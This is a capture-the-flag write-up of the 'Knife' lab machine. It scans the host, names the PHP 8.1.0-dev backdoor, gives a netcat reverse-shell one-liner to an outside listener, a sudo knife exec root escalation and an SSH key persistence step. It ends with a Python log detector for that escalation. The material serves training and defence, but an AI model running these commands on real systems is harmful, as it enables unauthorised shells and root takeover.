Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV 10.10.10.242

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:08 CST
Nmap scan report for 10.10.10.242
Host is up (0.064s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.26 seconds

Port 80

PHP backdoor

PHP/8.1.0-dev, a version that previously had a backdoor inserted through a supply-chain compromise:

Commands can be executed directly:

reverse shell & user flag

This gives a shell directly as the james user; user.txt is in that user's home directory:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 4444 >/tmp/f
python3 -c 'import pty;pty.spawn("/bin/bash")'

The james user's .ssh directory also contains a key pair, which can be used to SSH in directly for more convenient access later:

james@knife:~/.ssh$ cat id_rsa.pub > authorized_keys

ssh -i james_id_rsa james@10.10.10.242

Privilege escalation information

Checking sudo reveals knife, a tool that belongs to Chef Workstation:

According to the documentation, the exec subcommand runs Ruby code, so the usual sudo-with-Ruby privilege escalation applies directly:

Privilege escalation & root flag

sudo /usr/bin/knife exec -E 'exec "/bin/bash"'
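From the defender's side, the sudo invocation above leaves a trace in auth.log. The following is an added example (not part of the original writeup) that parses sudo log lines and flags any root-targeted run of knife exec, since that subcommand evaluates arbitrary Ruby and is equivalent to handing out a root shell; the log lines and the SHELL_EQUIVALENT set are constructed for the example.

```python
import re

# Constructed sample auth.log lines (not from the original page); the first one
# mirrors the privilege-escalation command shown above.
SAMPLE_LOG = """\
May 24 13:20:01 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife exec -E exec "/bin/bash"
May 24 13:21:10 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife node list
May 24 13:22:30 knife sudo:    alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Matches the standard sudo syslog line: timestamp, host, invoking user,
# target user and the full command string.
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sudo:\s+(?P<user>\S+) : "
    r".*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# knife subcommands that evaluate arbitrary Ruby; allowing them through sudo
# is the same as allowing a root shell (assumption: only exec is listed here).
SHELL_EQUIVALENT = {"exec"}


def parse_sudo_line(line):
    """Return the parsed fields of a sudo log line, or None if it is not one."""
    m = SUDO_RE.match(line)
    return m.groupdict() if m else None


def is_knife_shell(cmd):
    """True when the command is knife followed by a Ruby-evaluating subcommand."""
    parts = cmd.split()
    if not parts or parts[0].rsplit("/", 1)[-1] != "knife":
        return False
    return len(parts) > 1 and parts[1] in SHELL_EQUIVALENT


def find_knife_escalations(log_text):
    """Return (timestamp, user, command) for every root-targeted knife exec."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec and rec["target"] == "root" and is_knife_shell(rec["cmd"]):
            findings.append((rec["ts"], rec["user"], rec["cmd"]))
    return findings


if __name__ == "__main__":
    for ts, user, cmd in find_knife_escalations(SAMPLE_LOG):
        print(f"{ts}: {user} obtained a root shell via sudo: {cmd}")
```

The same check applied to the sudoers rule itself (any entry granting knife to a non-root user) catches the misconfiguration before it is used.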

References